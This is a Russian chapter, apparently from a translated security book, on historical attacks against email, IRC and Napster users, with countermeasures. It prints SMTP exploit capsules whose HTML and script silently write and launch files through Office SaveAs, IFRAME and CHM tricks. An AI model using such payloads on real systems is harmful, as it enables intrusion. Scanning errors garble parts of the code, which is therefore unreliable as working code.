    В июне 2000 года неизвестным злоумышленником был запущен "червь", получивший название LifeChanges. Его работа основывалась на описанных свойствах файлов . SHS. Этот "червь" направлялся в виде электронного сообщения с изменяющейся строкой темы, которая указывала на то, что во вложении находятся анекдоты. Файл вложения на самом деле был файлом . SHS с обманным расширением .ТХТ, которое делало его похожим на обычный текстовый файл (даже установленная по умолчанию пиктограмма этого файла была похожа на пиктограмму текстового файла). После запуска LifeChanges выполнял стандартные действия: рассылал себя по почте первым 50 адресатам из адресной книги жертвы, удалял файлы и т.д. Очень интересно было наблюдать, как кто-то выбрал основой для взлома коварную особенность файлов . SHS, которая была известна на протяжении нескольких лет, и с такой легкостью попал в хронику Web-узла PCHelp (http://www.pc-help.org/security/scrap.htm). Кто знает, сколько мин еще заложено в системном реестре Windows?

    Контрмеры против использования файлов. SHS



    На Web-узле PCHelp приведены некоторые замечательные советы по снижению риска от применения наиболее опасных свойств файлов . SHS. В число этих рекомендаций входят следующие.

    •  Удалите упоминавшийся ранее параметр системного реестра NeverShowExt и параметр HKLM\SOFTWARE\Classes\DocShortcut, чтобы расширения . SHS и . SHB стали видны в Windows. (Файлы . SHB обладают аналогичными свойствами.)
    •  Замените используемые антивирусные программы теми, в которых файлы . SHS и .SHB рассматриваются как исполняемые.
    •  Полностью откажитесь от файлов-оболочек, удалив их из списка известных типов файлов Windows либо удалив из папки System файл shscrap.dll.

    Сокрытие расширения вложения с помощью пробелов



    18 мая 2000 года Волкер Вес (Volker Werth) поместил в списке рассылки Incidents сообщение, в котором говорилось об одном методе отправки вложений в почтовых сообщениях. Особенность этого метода заключалась в остроумном способе маскировки имени присоединенного файла. Вставка в имя файла символов пробелов (%20) приводила к тому, что почтовые программы отображали только первые несколько символов имени файла. Например,
    freemp3.doc ... [150 пробелов]....ехе
    Название этого вложения выглядит в интерфейсе пользователя как freemp3.doc. Сам файл кажется вполне безобидным и, казалось бы, его можно сохранить на диске или запустить прямо из почтовой программы. Вот как выглядит моментальный снимок окна программы Outlook Express.


    Контрмеры против сокрытия имени присоединенного файла



    Из приведенного рисунка видно, что файл вложения не является документом Word. На это указывает и троеточие (...)• Если этих признаков недостаточно, то вообще не стоит открывать файл вложения прямо из почтовой программы! В этом поможет модуль обновления Outlook SR-1 Security. После его установки пользователю придется принудительно сохранять на диске те файлы, которые могут нанести ущерб.

    Методы социальной инженерии, помогающие ввести пользователя в заблуждение и загрузить вложение



    Социальная инженерия — это действенный метод, помогающий убедить пользователя сохранить файл вложения на диске. Вам когда-нибудь встречалось сообщение со следующим текстом?
    "This message uses a character set that is not supported by the Internet Service. To view the original message content, open the attached message. If the text doesn't display correctly, save the attachment to disk, and then open it using a viewer that can display the original character set."
    ("В данном сообщении используется набор символов, которые не поддерживаются используемой службой Internet. Чтобы просмотреть содержимое первоначального сообщения, откройте вложенное сообщение. Если текст отображается некорректно, сохраните вложение на диске, а затем откройте его с помощью программы просмотра, которая может отобразить первоначальный набор символов".)
    Это стандартное сообщение, которое создается в том случае, когда почтовые сообщения (в формате . EML) пересылаются пользователям Outlook и возникают некоторые ошибки с обработкой данных MIME вложенного/полученного сообщения. В этом случае каждый может попасться на крючок, что позволяет добиться запуска вложения (либо напрямую, либо после сохранения его на диске). Авторам доводилось получать такие сообщения даже с очень известных серверов. Конечно, это лишь одна из многочисленных возможностей, которой взломщики могут воспользоваться для реализации своих злонамеренных замыслов. Будьте бдительны!

    Меры предосторожности против трюков с вложением



    Контролируйте свои действия и не совершайте необдуманных поступков. Перед тем как запустить сохраненные на диске вложения, проверяйте их на наличие вирусов с помощью специальных программ. Даже если в результате проверки не будет обнаружено ничего подозрительного, перед запуском нужно всерьез подумать о том, кто является автором сообщения. При этом помните, что такие вирусы-"черви", как ILOVEYOU, могут быть получены даже от самых близких друзей.


    11.gif

    Изображение: 

    12. Запись вложений на диск без участия пользователя



    Запись вложений на диск без участия пользователя


    До сих пор речь шла о различных механизмах запуска файлов, которые можно обманным путем поместить на удаленный диск пользователя. Описанные выше виды взлома были рассчитаны на определенные исполняемые файлы (расположенные либо на удаленном сервере, либо на диске пользователя), выполняющие свою грязную работу. А что, если взломщик имеет возможность записывать на диск выбранной жертвы свои файлы? Пользуясь этим, можно разработать завершенный способ доставки в систему пользователя и запуска в ней файлов, реализующих взлом.

    Перехват функции Save As программ Excel и PowerPoint



    Фокус, лежащий в основе этого взлома, был придуман Георгием Гунински, который остроумно воспользовался функцией SaveAs программ Excel и PowerPoint. Как только документ Office с помощью дескриптора OBJECT вызывается в программе Internet Explorer (об этом уже упоминалось выше), появляется возможность сохранить данные в произвольном месте диска. В своей реализации этой идеи Георгий сохраняет данные, извлеченные из файла Bookl.xi.r-. Он является обычным файлом в формате Excel с расширением .xla. Если такой файл поместить в папку Startup, то во время загрузки системы он будет запущен.
    В следующем примере приведен слегка измененный код Георгия, помешенный в уже знакомую капсулу для взлома электронной почты.

    helo somedomain.com
    mail from: <mallory@attack.net>
    rcpt to: <hapless@victim.net>
    data
    subject: Check this out!
    Importance: high
    MIME-Version: 1.0
    Content-Type: text/html; charset=us-ascii
    <HTML>
    <h2>Enticing message here!</h2>
    id="shl" width=0
    height=0>
    </object>
    <SCRIPT>
    function f()
    {
    fn=" D:\\test\\georgi-xla.hta";
    shl.object.SaveAs(fn,6);
    alert(fn+" successfully written"};
    }
    setTimeout{"f()",5000);
    </SCRIPT>
    </HTML>
    quit

    Написанный Георгием код расположен между дескрипторами <object> и </SCRlPT>. Изменения внесены таким образом, чтобы указать полный адрес URL файла Bookl.xla (в первоначальной реализации этот файл был доступен непосредственно на Web-сервере). Содержимое Bookl.xla записывается в файл, указанный в строке fn=. Из исходного кода Георгия удалены также строки комментариев, в которых указано, как сохранить этот файл (предполагается, что об этом нетрудно догадаться). Просмотр этого сообщения в программе Outlook Express системы NT4 с зоной, для которой задан уровень безопасности Low, приведет к неожиданному появлению на короткое время окна передачи файла, вслед за которым появится следующее сообщение.


    Здесь авторы в качестве материала воспользовались уже готовым файлом Георгия Bookl.xla. Этот файл абсолютно безобиден. В нем содержится код длиной в пару строк, который при запуске выводит в окне DOS сообщение Hello World. Однако ввиду увеличения числа серверов, предоставляющих услуги по анонимному хранению файлов, хакеру-злоумышленнику будет совсем несложно создать свой собственный документ Office и обеспечить его загрузку. Готовой базой для размещения таких файлов также могут быть плохо настроенные или взломанные серверы FTP.

    Меры предосторожности против записи файлов с помощью программ Excel и PowerPoint



    Стоит ли повторять еще раз? Воспользуйтесь соответствующими модулями обновления, которые можно найти на Web-узле по адресу http://www.microsoft.com/ technet/security/bulletin/MS00-049. asp. Установка этих модулей обновления приведет к тому, что документы Excel и PowerPoint будут помечены как "unsafe for scripting" (пожалуйста, не торопитесь смеяться). Конечно, можно совсем запретить использование элементов управления ActiveX, как описано в разделе, посвященном зонам безопасности, тем самым раз и навсегда закупорив эту злосчастную брешь.

    Вложения с принудительной загрузкой



    Для описанного на Web-узле http://4-ww.malware.com способа загрузки файла на диск пользователя без его разрешения на этом же узле было предложено название принудительная загрузка (force feeding). Сущность данного подхода состоит в том, что, как утверждают специалисты, Outlook/OE игнорирует ответ пользователя на вопрос о том, что делать с файлом вложения электронного сообщения. Обычно, когда присоединенный файл запускается из почтовой программы, пользователю предоставляется три варианта действий: Open, Save To Disk или Cancel. Согласно утверждению, приведенному на узле malware.com, независимо от выбора пользователя вложение будет записано в каталог Windows %temp% (С: \Windows\temp — в Win 9x и С: \temp — в NT). Временные каталоги в Win 2000 настраиваются по усмотрению пользователя, поэтому, если эта система устанавливалась "с нуля", а не поверх предыдущих версий, определить их местоположение сложнее. Поместив требуемые файлы в систему пользователя, их можно запустить с помощью специального дескриптора HTTP. При этом броузеру скрытно и автоматически будет передана страница, указанная в дескрипторе. Например,

    <МЕТА HTTP-EQUIV="refresh"
    content="2;URL=http://www.othersite.com">

    Этот код, помещенный на Web-страницу, перенаправит броузер на Web-узел www.othersite.com. Параметр context= задает интервал ожидания, по истечении которого броузером будет выполнен заданный переход. Для принудительной загрузки операторы узла malware.com выбрали один из их локальных файлов и поместили его адрес в дескриптор.
    <meta http-equiv="refresh" content="5; 
    url=mhtml:file://С:\WINDOWS\TEMP\lunar.mhtml">
    В файле lunar.mhtml, который был вложен в сообщение и загружен без согласия пользователя, содержится ссылка на элемент управления ActiveX, помеченный флагом "safe for scripting", который запускает второй присоединенный файл. Он представляет собой исполняемый файл с именем mars . exe. В обход, но достаточно эффективно.
    Во время возникшей в бюллетене Bugtraq  дискуссии по поводу этой находки по крайней мере два авторитетных специалиста по вопросам'безопасности высказались против того, что описанный подход будет работать именно так, как предполагается. Тестирование, предпринятое авторами данной книги, проходило с переменным успехом. Даже при условии, что для соответствующих зон IE (см. предыдущие разделы), используемых также для чтения почтовых сообщений в программах Outlook/OE, был установлен уровень безопасности Low, положительного эффекта удавалось добиться не всегда. Успешная принудительная загрузка вложений происходила во временный каталог систем Win 98 SE и NT4 Workstation, в которых для зон был установлен уровень безопасности Low, но это происходило не всегда. Тайна принудительной загрузки по рецепту malware.com пока остается неразгаданной.
    Это обстоятельство слегка утешает. Пугает сама мысль о тех неприятностях, к которым мог бы привести такой подход в случае его применения совместно с методом Георгия Гунински, позволяющим запускать документы MS Office. Взломщики смогли бы посылать документы Office, содержащие в виде вложений злонамеренный код. Затем они могли бы послать второе сообщение, заключающее в своем теле соответствующие дескрипторы, которые указывали бы на каталог %temp%, где уже находилось бы принудительно загруженное вложение. (По существу, Георгий добивался того же результата, но с использованием одного сообщения. См. описание следующей атаки.)
    Конечно же, как уже упоминалось, доступность служб, предоставляющих возможность бесплатного и анонимного хранения файлов в Internet, избавляет от необходимости зафузки кода на локальный диск. Указав в своих сообщениях адрес одного из таких хранилищ, хакер сразу же обеспечивает доступность второго компонента. При этом самого взломщика выследить практически невозможно.

    Запись вложения в каталог TEMP с помощью дескриптора I FRAME



    Данный метод, который в 2000 году был опубликован Георгием в девятом номере его информационного бюллетеня , продемонстрировал дальновидность его автора, которому удалось умело воспользоваться, казалось бы, незначительными проблемами. Предложенный подход основан на том, что программы Outlook и Outlook Express создают в каталоге TEMP файлы с известным именем и произвольным содержимым, что очень похоже на механизм, созданный на узле malware.com. Однако, использовав другие свои разработки, в число которых входит использование изъяна, позволяющего запускать ярлыки файлов справочной системы Windows , и дескрипторы IFRAME, Георгий разработал, по-видимому, непревзойденный непротиворечивый механизм доставки кода и его последующего запуска. Поэтому авторы присвоили этому методу степень риска, равную восьми, т.е. наивысшую среди рассматриваемых. Он гораздо ближе других алгоритмов подошел к тому, чтобы стать целостным пакетом, предоставляя возможность записи файла на диск и запуска этого файла без необходимости какого-либо вмешательства пользователя.
    Фокус состоит в использовании в теле почтового сообщения дескриптора I FRAME, в котором содержится ссылка на вложение этого же сообщения. По какой-то причине, возможно, известной лишь Георгию, когда i FRAME "прикасается" к вложенному файлу, он сохраняется на диске. Затем этот файл легко вызвать из сценария, помешенного в тело этого же сообщения. В своей реализации Георгий записывает файл .СНМ, который элегантно сконфигурирован для запуска редактора Wordpad.exe с помощью команды "shortcut".
    Ниже представлена капсула, демонстрирующая применение описанного подхода. Обратите внимание на то, что файл СНМ должен быть упакован с помощью утилиты mpack (см. раздел "Сто и один способ взлома электронной почты").

    helo somedoir.ain.com
    mail from: <mallory@attacker.net>
    rcpt to: <hapless@victim.net>
    data
    subject: This one takes the cake!
    Importance: high
    MIME-Version: 1.0
    Content-Type: multipart/mixed;
    boundary="_boundaryl_"
    --_boundaryl_--
    Content-Type: multipart/alternative,
    boundsry="_boundary2_"
    --_boundary2_--
    Content-Type: text/html; charset=us-ascii
    <IFRAME align=3Dbaseline alt=3D"" =
    border=3DO hspace=3DO=20
    src=3D"cid:5551212"></IFRAME>
    <SCRIPT>
    setTimeout('window.showHelp
    ("c:/windows/temp/abcde.chm");',1000);
    setTimeout('window.showHelp
    ("c:/temp/abcde.chm");',1000};
    setTimeout('window.showHelp
    ("C:/docume-l/admini~l/locals~l/temp/abcde.
    chm"} ;
    ',1000} ; </SCRIPT>
    --_boundary2 --
    --_boundaryl_--
    Content-Type: application/binary;
    name="abcde.chm"
    Content-ID: <5551212>
    Content-Transfer-Encoding: base64
    [Закодируйте файл abode.chm с
    помощью утилиты mpack и вставьте его здесь]
    —_boundaryl_—
    quit

    В процессе тестирования, выполненного авторами на программах Outlook и Outlook Express, установленных в системах Windows 9x, NT и 2000, этот метод работал безотказно, чаще всего в режиме предварительного просмотра. Строки, которые начинаются с setTimeout, задают каталог каждой из трех операционных систем. Сможете ли вы установить между ними соответствие?
    Одним из ключевых элементов приведенного листинга является поле Content-ID. В нашем примере в этом поле введено число 5551212. Параметр scr дескриптора IFRAME, который содержится в теле сообщения, ссылается на идентификатор вложения этого сообщения, имеющего формат MIME. При этом возникает остроумно задуманная циклическая ссылка, позволяющая записать вложение на диск и обратиться к нему из одного и того же почтового сообщения.

    Контрмеры против использования дескрипторах FRAME



    Единственной защитой против атак такого рода является осторожное обращение с элементами управления ActiveX, как упоминалось в разделе, посвященном зонам безопасности. О выпуске соответствующего модуля обновления компания Microsoft не позаботилась.


    12.gif

    Изображение: 

    13. Уязвимость службы IRC



    Уязвимость службы IRC


    Internet Relay Chat (IRC) является одним из наиболее популярных приложений Internet. Эта программа привлекает пользователей не только тем, что они могут общаться в реальном времени, но и возможностью без задержки обмениваться файлами с помощью самых современных клиентских программ IRC (авторы отдают предпочтение mIRC). Вот здесь-то и начинаются проблемы.
    Нередко новичков IRC смущают частые предложения поделиться с ними файлами, поступающие от других пользователей, участвующих в канале связи. У многих из них достаточно здравого смысла, чтобы отказаться от предложений абсолютно незнакомых людей. Однако сама атмосфера IRC способствует быстрому завязыванию дружбы и переходу к менее формальным отношениям. Родственник одного из авторов попался на такую удочку, и его жесткий диск был отформатирован простеньким командным файлом. Имя родственника здесь не приводится в целях сохранения анонимности и репутации автора. Вскоре вы сами сможете убедиться в том, что эта проблема, как и проблема "невинных" вложений электронной почты, на самом деле оказывается гораздо более серьезной.

    Взлом DCC



    Интересная дискуссия по поводу описываемой в данном разделе атаки завязалась в списке рассылки Incidents на Web-узле http://www.securityfocus.com (обзор за 10-11 июля 2000 года, №2000-131). Вот поучительная история: любопытному пользователю предложили получить файл по прямому каналу DCC (DCC — direct client to client) (в службе IRC используются методы под названием DCC Send и DCC Get, предназначенные для установки прямого соединения с другим клиентом IRC и передачи/приема файлов с использованием этого соединения, а не сети IRC). Файл назывался LIFE_STAGES.TXT. (Где же он нам встречался? Загляните-ка в один из предыдущих разделов, в котором описываются вложения файлов . SHS Windows.). Ясно, что это была либо очевидная попытка причинить вред, либо автоматизированная атака, выполняемая с использованием взломанного клиента IRC без ведома его хозяина.
    Это одна из особенностей IRC, быстро обезоруживающая новых пользователей. Попав к какому-либо клиенту 1RC, вирусы-"черви" могут упаковывать себя в сценарии и рассылаться по каналу DCC каждому, кто к нему подключен. При этом пользователь за терминалом может даже ни о чем не догадываться.
    Более того, похоже, что этот обсуждаемый в списке Incidents "червь" был способен автоматически игнорировать каналы, в которых дискутировались вопросы защиты от вирусов. Также автоматически игнорировались собеседники, упоминающие в своих сообщениях такие понятия, как "infected", "life-stages", "remove", "virus" и многие другие предостерегающие слова. Поэтому, если пользователь не отключит функцию автоматического игнорирования, может пройти немало времени, прежде чем его смогут предупредить об этой опасности.

    Контрмеры



    К счастью, большинство клиентов IRC по умолчанию загружают файлы, передаваемые по DCC, в заданный пользователем каталог. После получения файла пользователь должен зайти в этот каталог и запустить файл вручную.
    Также как и к вложениям электронной почты, к файлам, переданным по каналу DCC, следует подходить с большим скептицизмом. Кроме обычных "нарушителей" (файлов с расширениями .ВАТ, .сом, . EXE, . V3S и . DLL), обращайте внимание также на документы Microsoft Office, в которых могут содержаться опасные макросы, а также на различные средства автоматизации, способные захватить контроль над клиентским приложением. Для проверки этих файлов мы настоятельно рекомендуем использовать антивирусные программы.
    Обычно попытки выслеживания зловредных пользователей IRC являются абсолютно бесполезным занятием и попросту приводят к потере времени. В дискуссии, которая проводилась в списке Incidents, упоминалось о том, что большинство взломщиков подсоединяются к каналу IRC с помощью виртуальных узлов и BNC (IRC Bouncer; по существу, это proxy-сервер службы IRC). Таким образом, отслеживай;;: пути прохождения пакета в обратном порядке позволит выявить IP-адрес не сидяи:гг: за терминалом пользователя, а сервера ВМС.


    14. Взлом Napster с помощью программы Wrapster



    Взлом Napster с помощью программы Wrapster


    Хотя авторы и не считают, что приложения Napster и Wrapster в настоящее время представляют большую угрозу для безопасности, они полагают, что оба программных продукта в значительной мере обладают отличительными особенностями программ, имеющих отношение к хакингу. Именно поэтому о них следует упомянуть в данной книге. Те читатели, кто знает, о чем пойдет речь в этом разделе, могут сразу перейти к следующему. А тем, кто ничего не слышал хотя бы об одной из этих программ, стоит с ними познакомиться. Всем, независимо от отношения к проблемам интеллектуальной собственности и авторского права, будет полезно узнать о необычайном удобстве, богатстве выбора и настоящем удовольствии, предоставляемом программой Napster.

    Еще один пример программного продукта, по вине которого могут возникнуть проблемы нарушения безопасности, вызванные сочетанием его мощи и популярности, — революционное изобретение для сетевого обмена файлами компании Napster (http://www. napster.com). Пакет Napster представляет собой разновидность типичного средства обмена файлами на платформе клиент/сервер. При этом сервер функционирует в качестве централизованного индексного указателя аудиофайлов в формате МРЗ, которые хранятся на жестких дисках всех пользователей, подсоединившихся к сети с помощью клиентской программы Napster. В индексном указателе пользователи могут выполнять поиск МРЗ-файлов. которые они хотят загрузить, а сервер соединяет их клиентскую программу непосредственно с тем пользователем, на диске которого хранятся требуемые файлы. Таким образом, все пользователи, желающие принять участие в обмене, должны выделить какой-то участок своего жесткого диска и предоставить остальным право чтения/записи.
    Чтобы предотвратить возможность распространения опасных программ, компания Napster пытается устранять из сети файлы, формат которых отличен от МРЗ. Для этого выполняется проверка бинарных заголовков файлов, предназначенных для копирования, на их соответствие формату МРЗ. В версиях Napster, выпушенных после появления бета-версии 6, применяется новый алгоритм проверки, в котором наряду с заголовком файла проверяется еще и его содержимое.
    Как и следовало ожидать, та же человеческая изобретательность, благодаря которой появилось программа Napster, вскоре нашла способ скрытой передачи по сети файлов в формате, отличном от МРЗ. Программа Wrapster, автором которой является Октавиан (Octavian), скрывает типы файлов, выдавая их за подлинные файлы МРЗ, "закодированные" с определенной скоростью передачи битов (32 Кбит/с). Такая маскировка позволяет подобным файлам рассматриваться сетью Napster как МРЗ. Те, кто хочет увидеть результат работы Wrapster, могут просто выполнить в сети Napster поиск файлов с указанной выше скоростью передачи битов, что приведет к обнаружению всех имеющихся файлов Wrapster. Или, если известно, какими файлами обменивались ваши друзья, можно выполнить поиск по имени и скорости передачи битов. Теперь у нас есть сеть для обмена популярными музыкальными файлами и механизм создания программ типа "троянский конь", облаченных в музыкальный формат. Кто-то из читателей уже увидел причину для беспокойства?
    К счастью, для запуска файлов Wrapster требуется, чтобы сначала были извлечены псевдофайлы МРЗ с помощью вспомогательного приложения. Обычный двойной щелчок на закодированном программой Wrapster файле приведет к тому, что его попытается открыть установленная в системе программа проигрывания музыкальных файлов. При этом он будет признан как ложный МРЗ и загрузить его .не удастся. Это избавляет пользователя от необходимости разработки или освоения технологии, позволяющей определять степень опасности вложенного файла. Стоит еще раз вспомнить известную истину: единственным барьером, разделяющим великие вещи (свободно распространяемую музыку) от программ, неожиданно форматирующих жесткие диски, является человеческая этика.

    Появились сведения о том, что различные клоны пакета Napster, распространяющиеся через открытые источники, обладают изъяном. Он позволяет взломщикам просматривать файлы на том компьютере, на котором запущена уязвимая клиентская программа Napster (в официальных коммерческих версиях этот изъян отсутствует). 


    15. Глобальные контрмеры против атак на пользователей Internet



    Глобальные контрмеры против атак на пользователей Internet


    В этой главе приведено множество опасных атак на пользователей Internet. Многие из описанных приемов направлены на то. чтобы обманным путем принудить пользователя запустить вирус, "червь" или другой опасный код. Кроме того, были представлены многие частные решения подобных проблем. Теперь пришло время познакомиться с общими методами зашиты против подобных атак.


    16. Постоянно обновляйте антивирусные базы данных



    Постоянно обновляйте антивирусные базы данных


    Конечно, такое средство защиты, как антивирусные программы, существует и повсеместно используется уже давно. Тот. кто не применяет их для обеспечения безопасности своей системы, подвергает себя большому риску. Подобное программное обеспечение можно приобрести у многих разработчиков. Известные антивирусные пакеты (такие как Norton Antivirus компании Symantec, McAfee, Data Fellows, Trend Micro. Inoculan/InoculateIT компании Computer Associates и другие) соревнуются между собой, стараясь обеспечить наиболее полную защиту от злонамеренного кода.
    Один из основных недостатков антивирусного программного обеспечения заключается в том, что эти программы не могут обеспечить упреждающую защиту против новых вирусов, появившихся после их выхода и которых они еще не могут распознать. Разработчики антивирусных программ полагаются на механизмы обновления, периодически предлагая своим клиентам обновлять антивирусные базы данных, в которые заносятся сведения о новых обнаруженных вирусах. Таким образом, между появлением новой разновидности вируса и разработкой обновленной базы данных образуется интервал времени, в течение которого пользователь остается уязвимым.
    До тех пор пока пользователь помнит об этом временном зазоре и его антивирусное программное обеспечение настроено для автоматического и регулярного (хотя бы раз в неделю) обновления, средства антивирусной защиты обеспечивают надежную линию обороны против большинства из описанных ранее атак. На забывайте о том, что для получения наиболее полной отдачи нужно пользоваться средствами автоматической защиты, особенно для автоматического сканирования почтовых сообщений и гибких дисков. Кроме того, постоянно обновляйте антивирусные базы данных! Большинство разработчиков предлагают их бесплатное автоматическое обновление в течение года, однако затем за небольшую плату потребуется продлить подписку. Например, в компании Symantec стоимость годовой подписки на службу LiveUpdate составляет всего $4. За такую сумму с Web-узла компании  можно вручную загружать обновления.
    Следует помнить также о возможности розыгрыша, который может причинить не меньше вреда, чем сам вирус. 


    17. Защита шлюзов



    Защита шлюзов


    Надежная стратегия защиты на уровне сети является наиболее эффективным способом защиты большого количества пользователей. В качестве средства для решения многих описанных в этой главе проблем, конечно же, следует выбрать брандмауэр. Особое внимание нужно уделять спискам управления доступом из глобальной сети, которые могут стать мощной преградой для коварного кода, пытающегося проникнуть на плохо настроенные внутренние серверы.
    Кроме того, имеется множество программных продуктов, осуществляющих сканирование входящей электронной почты и трафика Web и выполняющих поиск опасного мобильного кода. Одним из таких примеров является пакет SurfinGate компании Finjan , который можно использовать на границе сети (в качестве дополнения к существующему брандмауэру или в качестве proxy-сервера) для проверки всего получаемого извне кода Java, элементов ActiveX, JavaScript, исполняемых файлов, сценариев на Visual Basic и файлов cookie. Затем на основе действий, запрашиваемых каждым модулем кода, программа SurfinGate создает соответствующий профиль. Далее модули однозначно идентифицируются с помощью хэш-кода MD5, так что при загрузке каждого модуля требуется лишь одно сканирование. Созданный профиль сравнивается с политикой безопасности, созданной сетевым администратором. Затем на основе результатов сравнения программой SurfinGate принимаются "разрешающие" или "блокирующие" решения. Компания Finjan предоставляет также различные версии программы SurfinGuard, которая обеспечивает механизм защиты против необдуманного запуска загруженного кода.
    Интересная технология, реализованная компанией Finjan, помогает загруженным и малоинформированным пользователям в решении проблемы защиты от мобильного кода. Дополнительным преимуществом этого заградительного барьера является его способность предотвращать атаки с применением средств сжатия исполняемых файлов в формате РЕ (portable executable), которые способны уплотнять .ЕХЕ файлы Win32 и фактически изменять их бинарную подпись. В результате уплотненный исполняемый файл может ввести в заблуждение любой статический механизм вирусной проверки, поскольку исходный файл . ЕХЕ не извлекается до его запуска (поэтому традиционная проверка ничего не дает). Конечно же, успех такой стратегии зависит от принятой политики безопасности и заданных параметров специального программного обеспечения, которые по-прежнему настраиваются теми же безответственными людьми, которые повинны во многих описанных в этой главе ошибках.


    18. Резюме



    Резюме


    После написания этой главы нам хотелось бы облегченно вздохнуть и снова на несколько лет окунуться в дальнейшие исследования методов хакинга пользователей Internet. На самом деле за рамками книги осталось еше много материала на эту тему. Описать все разнообразие проверенных и непроверенных атак, применяемых против обычного клиентского программного обеспечения, оказалось непростым делом. Наряду с десятками остроумных подходов, разработанных такими яркими личностями, как Георгий Гунински, в окончательный вариант книги не попали многие вопросы, касающиеся взлома Web-серверов, предоставляющих услуги электронной почты (Hotmail), хакинга пользователей службы AOL, взлома линий связи с модулированной передачей данных в Internet и получения личных данных клиентов. Конечно, перед сообществом Internet еще долгие годы будут стоять все эти проблемы, а в будущем появятся новые, которые пока что даже трудно представить. Ниже приведены некоторые рекомендации, следуя которым, пользователи смогут обеспечить наиболее высокий уровень безопасности, который возможен на сегодняшний день.

    •  Постоянно обновляйте клиентское программное обеспечение! Что касается продуктов компании Microsoft, часто подвергающихся таким атакам, то можно воспользоваться несколькими возможностями (что позволит использовать время более рационально).
    •  Приобретите и постоянно используйте антивирусное программное обеспечение. Не реже одного раза в неделю обновляйте антивирусные базы данных. Установите максимально возможное количество служб автоматического сканирования (одной из служб, которой следует воспользоваться, является служба сканирования электронной почты).
    •  Пополняйте запас знаний о таких потенциально опасных технологиях мобильного кода, как элементы управления ActiveX и Java. Настраивая клиентское программное обеспечение Internet, помните о необходимости осторожного обращения с этими мощными инструментами (см. раздел этой главы, посвященный зонам безопасности Windows,). 
    •  Сохраняйте здоровый скептицизм по отношению к файлам, полученным из Internet, будь то вложения электронной почты или файлы, предложенные для загрузки по каналам DCC или IRC. Если надежность источника вызывает хоть малейшие подозрения, такие файлы следует тут же отправлять в мусорную корзину. Не забывайте также о том, что коварные программы-"черви", например I LOVE YOU, могут маскироваться и попасть к пользователю от имени его хорошего знакомого, почтовая клиентская программа которого была взломана.
    •  Постоянно обновляйте набор инструментов и будьте в курсе появляющихся новых технологий хакинга в Internet. Заглядывайте на перечисленные ниже Web-узлы экспертов в области безопасности, которые первыми выявляют изъяны программного обеспечения.